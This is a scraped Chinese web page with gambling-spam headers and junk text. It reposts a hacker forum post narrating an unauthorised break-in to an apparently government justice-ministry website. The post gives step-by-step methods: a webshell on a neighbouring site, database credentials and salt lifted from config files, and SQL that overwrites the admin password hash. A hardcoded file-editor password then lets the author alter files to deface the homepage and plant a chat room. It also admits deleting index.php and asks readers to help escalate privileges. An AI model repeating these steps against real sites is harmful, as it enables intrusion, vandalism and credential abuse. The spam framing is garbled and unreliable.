亚博国际娱乐场_亚博国际娱乐场_【澳门路线】
<meta content="亚博国际娱乐场清明节期间就算再多也能做完二是健全国家治理体系和实现治理能力现代化的需要邵坪高速转安邵高速的寸石互通当日通车但实际上却变成了‘P’" name="description">
手机阅读：
杜鹃花好养吗
【尴尬不断】
“在家具行业中
按市民的要求提升农民
&<a href="/"教师招聘首先看了一下网站，没看出是什么程序写的，也没发现值得深入下手的地方。于是便旁注了，很快，拿到了一个旁站的shell。这才发现，服务器支持asp,aspx,php，但是限制很多。简单试了下没提权成功。反正拿服务器不是首要任务，首要任务是挂菊花聊天室，先挂上聊天室再提权(后来事实证明，还是先提权才能把主页挂上菊花的)。******************好了，正文开始******************很庆幸，这个vhost网站能跨站读取源码，但是权限不够，可以用webshell跨站读取一部分网站的源码，但是不能直接拷贝或者上传文件到目录当然，意思就是不能直接对doj.xx这个网站的目录中写入文件或者修改文件代码简单翻了一下网站目录，没有明显的后台登陆地址的标记登陆了一下MySQL账户，不是root，还是4.x，用处不大这几个目录中比较可疑的是：http://www.doj.xx/doj2.0/c0ntent/login.php访问这个地址，这个目录明显就是后台，这货后台隐藏的也够深的。如果这是注入拿站，拿站的人是要死的，MySQL 4.x的版本，管理员表是doj_auth_users，字段是pangalan，密码是n位SALT的SHA512加密，后台又这么深，真的是基霸管理员啊后台隐藏这么深，我很怀疑是之前新闻说的F国要求各部门加强网站安全性通知以后管理员抽风给做成这样的我先看了一下登录文件login.php的代码：if (isset($_POST[&#39;submit&#39;])) {if (empty($_POST[&#39;user&#39;]) || empty($_POST[&#39;pass&#39;])) {
$msg = &ERROR: Please check your input!&;}/***** Calculate hashed password *****/$hash = new Crypt_Hash(&#39;sha512&#39;);$password = bin2hex($hash-&hash(SALT.clean_field($_POST[&#39;pass&#39;], 1)));$LOGINQUERY = &SELECT * FROM &.TBL_LOGIN.& WHERE pangalan = &#39;&.clean_field(base64_encode($_POST[&#39;user&#39;]), 1).&&#39;AND pasword = &#39;&.$password.&&#39;&;$result = mysql_query($LOGINQUERY) or $msg = &Error executing query.&;这段是密码验证部分的代码，简单来分析一下代码好了Calculate hashed password前面的部分是验证输入的不为空，这个很简单，Calculate hashed password后面是加密密码和验证的部分，这里就比较郁闷了pangalan应该是用户名的表段，而password明显就是密码的表段了。管理员字段是在：TBL_LOGIN 这个常量中存放的$password这个变量是经过加密的，看加密格式：$password = bin2hex($hash-&hash(SALT.clean_field($_POST[&#39;pass&#39;], 1)));先将POST提交的密码一次处理(初步判断是去空格引号转义等功能)后，和SALT常量结合，然后hash加密那么我们再登陆数据库看看，登陆信息在include.php文件中，数据库的信息如下：define (&HOST&, &localhost&);define (&USER&, &dojmis&);define (&PASS&, &P@ssw0rd123&);define (&DATABASENAME&, &wcms1&); define (&ADMIN_EMAIL&, &&);define (&ADMIN_EMAIL&, &misd., hgtubangi@doj.xx, &);define (&SALT&, &Th1sSp3rL0ngStr1ngW1llPr0t3ctMyUs3rsAg@1nst1ns3cur3P@ssw0rds&); // salt to strenghten passwordsdefine (&TBL_LOGIN&, &doj_auth_users&);用dojmis和密码P@ssw0rd123登陆数据库成功(我很怀疑P@ssw0rd123就是FTP密码)执行以下SQL语句：select pangalan,0x3a,pasword from doj_auth_users上面的管理员表段名也是从include.php中找出来的，自己仔细看一下得到：bWJi:bb376dada5b420a644cf2a29e997e9abbfaaa13cefeafa784cb5dba17a10f83b我了个去，这么长的密文，跟md5看来是没关系了，直接逆向恐怕更不可能了那咱们就分析分析他的加密方式，根据他的加密方式，咱们自己制作一个密码，直接给他改密码好了，然后用咱们自己的密码登陆后台这中间有个clean_field()函数，这个函数在function.php中，其实看名字就知道是去空格等操作了，所以我们直接忽视上面的加密方式中有个SALT，那就先找SALT在include.php文件中：define (&SALT&, &Th1sSp3rL0ngStr1ngW1llPr0t3ctMyUs3rsAg@1nst1ns3cur3P@ssw0rds&);这么长的SALT，如果不提前知道，怎么能跑的出来密码。不过好在我们已经知道了假定我要将密码设置为：silic，那么根据他的算法，加密前先和SALT混合，就是：Th1sSp3rL0ngStr1ngW1llPr0t3ctMyUs3rsAg@1nst1ns3cur3P@ssw0rdssilic然后看看怎么进行hash加密看了这行代码：$hash = new Crypt_Hash(&#39;sha512&#39;);应该是sha512八九不离十了。于是将Th1sSp3rL0ngStr1ngW1llPr0t3ctMyUs3rsAg@1nst1ns3cur3P@ssw0rdssilic进行SHA512加密以后就得到：c42c6c5c1e85c1edff8ef3a7cfd43a489ce92f62fb0c9b0ba8f5cad5b6d61459a6a得到了我们特定的密码的加密，然后就该修改数据库密码为我们的密码了。在数据库中执行SQL语句：UPDATE doj_auth_users SET pasword=&#39;c42c6c5c1e85c1edff8ef3a7cfd43a489ce92f62fb0c9b0ba8f5cad5b6d61459a6a&#39; WHERE pangalan=&#39;bWJi&#39;就将后台的登陆密码修改为silic了但是这还没有结束，因为我们的目的是取到Webshell(其实这是图省事，因为咱们目的就是给他挂挂首页，取到Webshell足矣。但是。。。千万别抱这种想法，因为这个网站目测不提权是改不了主页的)在登陆后台前，需要注意一个地方：WHERE pangalan = &#39;&.clean_field(base64_encode($_POST[&#39;user&#39;]), 1).&&#39;AND pasword = &#39;.....这里的用户名字段是pangalan，但是用户名是经过了base64加密的，数据库中的pangalan字段数据是bWJi，实际上的密码需要经过base64解密，解密后得到实际登陆用户名为：mbb用户名解出来了，密码自己给他改上去了。登陆后台后台很简陋(但是很牛逼，居然会封ip，而且从头至尾居然封了我好几个ip，最后一不小心把index.php文件删了，也算是解了封我ip的气)拿到webshell的话，发现只有一个fileedit.php可以加以利用，其他都是纯数据库操作我看了半天没看明白怎么用，两个输入框，左边长右边短还是仔细分析一下代码：if ($_SESSION[&#39;fe_flag&#39;] == 1) {$f=fopen ($_SESSION[&#39;fe_filename&#39;],&rb&);$_SESSION[&#39;fe_data&#39;]=&#39;&#39;;while(!feof($f))$_SESSION[&#39;fe_data&#39;].=fread($f,filesize($_SESSION[&#39;fe_filename&#39;]));fclose($f);仔细搜一下，果然又有一个密码验证，当POST的变量comment为密码时，就可以操作文件了这次看清楚了，应该是没有加密了，直接密码就是：L@br@d0r再来看一下这个功能框里面的源码，看看哪个是comment变量：&form name=&form1& method=&post& action=&fileedit.php&&File: &input type=&text& name=&titlepage& value=&&
size=&80& /&&&&input type=&text& name=&comment& value=&& size=&15& /&&br /&&br /&&center&&input type=&submit& name=&#39;getfilename&#39; value=&#39;Get File&#39; /&&/center&&br /&&/form&第一个输入框是文件名(titlepage变量)，第二个输入框是密码(comment变量)当第二个框的变量通过了系统的密码验证，就将第一个变量接收并读取这个文件那么第一个框输入test.php第二个框输入L@br@d0r就能修改test.php这个文件了回复本帖可以看到webshell地址(我在这电脑里面翻了半天，没提权成功，谁有兴趣帮我提一下顺便发一下自己的过程我就万分感谢了，然后我继续搞下一个了webshell地址和聊天室地址：[via@习科论坛-Mr.Cool]（点击“阅读原文”可以进行评论或浏览更多文章喔，还可直接回复订阅号，告诉妹子你的看法(￣▽￣)~*）91RI我的安全攻防指南(sex_91ri)　
　文章为作者独立观点，不代表大不六文章网立场
sex_91ri91RI我的安全攻防指南热门文章最新文章sex_91ri91RI我的安全攻防指南&&&&违法和不良信息举报电话：183-
举报邮箱：
Copyright(C)2016 大不六文章网
京公网安备78君，已阅读到文档的结尾了呢~~
扫扫二维码，随身浏览文档
手机或平板扫扫即可继续访问
325-企业概况 企业文化 应用领域 愿景规划 组织架构 领导致辞 关注我们
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由：
将文档分享至：
分享完整地址
文档地址：
粘贴到BBS或博客
flash地址：
支持嵌入FLASH地址的网站使用
html代码：
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布，请您等待！
3秒自动关闭窗口